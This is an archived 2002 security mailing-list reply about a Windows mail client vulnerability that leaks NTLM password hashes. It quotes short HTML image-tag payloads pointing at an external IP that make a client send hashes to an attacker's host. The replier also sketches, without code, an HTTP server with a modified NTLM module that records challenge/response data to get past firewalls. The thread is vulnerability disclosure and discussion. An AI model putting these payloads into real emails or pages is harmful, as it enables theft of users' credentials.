Re: Hijacking the hashes : multiple windows mail clients vulnerability

From: olle (olle@nxs.se)
Date: Thu Jul 04 2002 - 08:45:13 EDT


On Wed, Jul 03, 2002 at 04:43:46PM -0000, overclocking_a_la_abuela@hotmail.com wrote:
>
<snip>
> So, what about if there was another method to force a user on a windows
> box to send you his hashes, without his knowledge, without using any
> interactive method, non javascript, non activeX, non some lame social
> engeneering technique... only HTML ?
>
<snip>

> 1st) <img src="file://\\\\external_IP\\resource"> or 2nd) <img
> src="\\\\external_IP\\resource">.

As you say in your post, any good firewall/border router would stop this.

You could try a normal http:// url to your apache server with a hacked up
NTLM-authentication module that records the challenge/resonse fields in
the SSP exchange... This would most likely bypass any firewall/proxy...

Never actually done this, but it might be fun to hack up som code similar
to slingerbult[1] that just solicits an SSP challenge/response and returns
a 1-pixel transparent gif or something... ;)

It would be fun if someone tried this out, I don't think I will have the
urge to do it any time soon, but it's been on my mind for quite some time.

/olle

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:23 EDT